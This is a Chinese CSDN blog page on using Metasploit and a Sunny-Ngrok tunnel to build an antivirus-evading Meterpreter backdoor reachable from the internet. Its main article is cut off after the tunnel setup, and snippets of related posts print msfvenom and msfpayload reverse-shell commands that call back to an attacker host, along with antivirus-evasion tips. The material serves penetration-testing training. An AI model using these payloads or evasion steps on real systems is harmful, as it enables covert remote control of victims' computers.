渗透测试(二)-Metasploit生成免杀后门(外网篇)

原创 已于 2024-06-19 22:21:28 修改 · 1.4k 阅读 · 43 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web #渗透测试 #测试工程师 #网络安全 #kali linux

于 2021-05-25 16:43:08 首次发布
本文介绍了如何使用Sunny-Ngrok免费服务器开通隧道,并在Kali Linux中启动隧道,生成WindowsMeterpreter后门,通过监听和Apache服务下载后门,实现远程控制目标系统的操作流程。

1. Sunny-Ngrok 开通隧道

  1. 首先在官网注册会员
  2. 登陆
  3. 选择要开通的服务器
  4. 这里我们选择美国Ngrok免费服务器

 选择tcp协议,填一个可以使用的端口号。

 开通隧道后可以在 隧道管理 中看到自己的隧道信息:

记住这里的 隧道id赠送域名 以及 隧道端口,下面会用到。

</

最低0.47元/天 解锁文章
Metasploit生成恶意程序
maoyeyedezhihui的博客
05-09 1581
1.注意事项 以下渗透测试坏境需要windows xp sp3,之前用的sp2,程序执行时一直报错提示找不到kernel.dll,其实是sp2系统不支持,是系统自身的问题。 2.生成独立运行的进制文件 在演示技术之前,先用MSF攻击载荷生成(msfvenom)创建一个可独立运行的Metasploit载荷程序。在此,选择创建一个反弹shell程序,它能够回连到攻击机,并弹出一个命令行shel...
Metasploit
PortugalCR7的博客
06-29 841
本次实验中不管是利用msf中的编码器进行编码还是用加壳脚本,目的都是要绕过Windows系统的查,但还是不能够逃过毒系统的检测,故还是要寻找更好的方式来进行。把cr7.exe放入靶机中运行(成功)毒软件报毒)利用msf自带编码器进行编码。利用msf自带编码器进行编码
Metasploit外网渗透测试
Cheng_Yg的博客
07-25 512
作为一个强大的渗透框架,深受脚本小子们喜爱,但对于刚入坑的小白似乎不太友好,经常因为无法渗透外网而感到头疼,生成后门木马之后却只能在内网使用,本文采用cpolar内网穿透进行演示,对外网Android设备进行渗透测试
聊聊 Metasploit
最新发布
qq_41179365的博客
05-29 1232
第一节:的本质是什么?(用厨房挑食材来解释) 想象一下,你半夜饿了,厨房冰箱里有好几种食材(各种payload载荷),但你得避开厨房的感应灯(毒软件的监控)。你用普通的炸鸡、火腿,容易触发感应灯,直接被抓包。但如果你懂得挑选“隐蔽食材”(改造payload、混淆特征),比如用昨晚剩的米饭包点咸菜,裹点蛋液(变形处理),不仅填饱肚子,还能悄悄溜回卧室,没人发现。 --- ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/b0efeba447b24cffa5
Metasploit初探索
mingyqf的博客
12-05 494
Metasploit初探索 转载链接:https://zhuanlan.zhihu.com/p/222968474 安全狗 安全狗 领先的云安全服务与解决方案提供商 2 人赞同了该文章 0x01 环境搭建 测试系统:windows10 (1909) 毒软件:360安全卫士 在线毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe
渗透测试()-Msf生成后门(内网)
阿航的博客
05-25 3509
实验环境: 攻击机:kali linux-2021.1(192.168.56.128) 靶机:Windows10(192.168.1.120) 推荐两个费在线木马检测网站:VirusScan和VirusTotal 原理图: 1. Meterpreter简介 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作为攻击载荷能够获得目标系统的一个Meterpre..
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 5119
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
渗透利器-kali工具 (第五章-6) Metasploit后门生成模块
ztc131450的博客
12-16 803
后门生成模块到权限维持:技术发展史:理论上讲,一定是出现在毒软件之后的。通过毒软件的发展史不难使用,第一款毒软件kill 1.0 是Winsh公司1987年推出的。也就是说技术至少在1989年以后才发展起来。[国外无从拷问,国内非常晚]1989年:第一款毒软件Mcafee诞生,标志着反病毒反差时代的到来1997年:国内出现了第一个可以自动变异的千面人病毒,自动变异就是病毒针对毒软件的方法之一,但是与手法的定义有出入。
渗透测试框架】Metasploit-Framework(MSF)安装与使用
李同學的安全圈
05-23 8071
文章目录前言一、Metasploit简介Metasploit安装及更新一键安装更新Metasploit三、Metasploit数据库连接四、Metasploit模块介绍Exploit模块Payload模块常见的几种 Stagers PayloadMeterpreter五、Metasploit实战攻击六、后渗透攻击阶段后渗透常用命令POST后渗透常用模块生成持续性后门程序Metasploit Socks代理PowerShell脚本(域内信息收集)加载stdapi升级会话SessionMeterpreter
Metasploit——木马
12-01 360
1.生成简单到木马后门 root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp O //查看这个payload有什么选项 root@bt:/opt/metasploit/msf3# ./msfpayload windows/shell/reverse_tcp LHOST=192.16...
Metasploit(msf)系列-木马
chaojixiaojingang
10-10 9549
    木马文件风险高,想要需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 原理:        首先生成木马文件,然后将生成的木马文件与shellter工具捆绑,然后设置监听,将捆绑后的文件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该文件在腾讯哈勃分析系统上分析。 准备: 靶    机:WinXP系统  ip:192.168.1.10...
Kali使用Metasploit内、外网渗透windows系统
vvoennvv的博客
11-05 1095
内网穿透是我们在进行网络连接时的一种术语,也叫做NAT穿透,即在计算机是局域网内的时候,外网与内网的计算机的节点进行连接时所需要的连接通信,有时候就会出现内网穿透不支的情况。内网穿透的功能就是,当我们在端口映射时设置时,内网穿透起到了地址转换的功能,也就是把公网的地址进行翻译,转成为一种私有的地址,然后再采用路由的方式ADSL的宽带路由器,具有一个动态或者是固定的公网IP,最后ADSL直接在交换机上,这样所有的电脑都可以共享上网。-p, --payload 指定需要使用的payload(攻击荷载)
Metasploit reverse Shell的(炊少教学)
weiliang369的博客
02-25 466
rootkithat是我以前的马甲 以前写的文章 我们先生成一个X64的WINDOWS XP 的reverse SHELL 1 2 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/ meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm
Metasploit学习之技术
习惯积淀的博客
01-12 726
文章目录面技术使用msf攻击载荷生成器创建可独立运行的进制文件躲避毒软件的检测 面技术 使用msf攻击载荷生成器创建可独立运行的进制文件 msfpayload windows/shell_reverse_tcp O 使用O选项来查看可用的参数 msfpayload windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=31337 X /va...
使用metasploit制做基础的后门程序
梦想闹钟
05-23 394
这里使用metasploit自带的payload生成后门exe文件,LHOST指定连接的地址,LPORT字面意思指定连接的端口,靶机在点击后,就会自己去连接攻击机的端口 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.131 LPORT=6060 -f exe > myvirus.exe 之后上传到windows xp的靶机里并点击运行,需要先确保靶机和攻击机能ping通 之后在攻击机再次加载对应的payload并进行监
】————3、Excel 和 Metasploit
Fly_鹏程万里
03-07 1048
文章主要介绍以Excel文件为载体,生成meterpreter反向shell的不同方法。 简介 这文章会继续讨论反向shell和规避毒软件的方法。有兴趣的可以看我的前一文章。随着时间飞逝,以前一些很好的绕过毒软件的方法现在均已失效。所以,我必须找到一种新的方法来隐藏我的反向shell。让我们开始吧…… …古老而简单的方法可能是最好的… 通过SMB_Deliver开启一个me...
利用metasploit生成后门
mirror97black的博客
01-26 5821
之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多软,对各种木马有检测机制,执行危险代码或者运行危险程序,软会进行阻止。 有很多种方式,今天介绍一种利用msf生成shellcode,编译为exe文件,这种能够绕过大部分软 静态 静态是能够绕过软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
后门攻击——Metasploit的使用
m0_57069925的博客
06-15 2115
此文章可以学习通过kali中的Metasploit生成后门程序,控制Windows系统的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责一.简介后门攻击是一种新兴的针对深度学习模型的攻击方式,攻击者在模型的训练过程中通过某种方式对模型植入一些后门。当后门未被激发时,被攻击的模型具有和正常模型类似的表现;而当模型中埋藏的后门被攻击者激活时,模型的输出变为攻击者预先指定的标签以达到恶意的目的。简单的说明msfvenom是生成木马的,而msfconsole是监听的.攻击演示攻击者:kali 20
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿航的博客

我比你有钱,请不要打赏!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值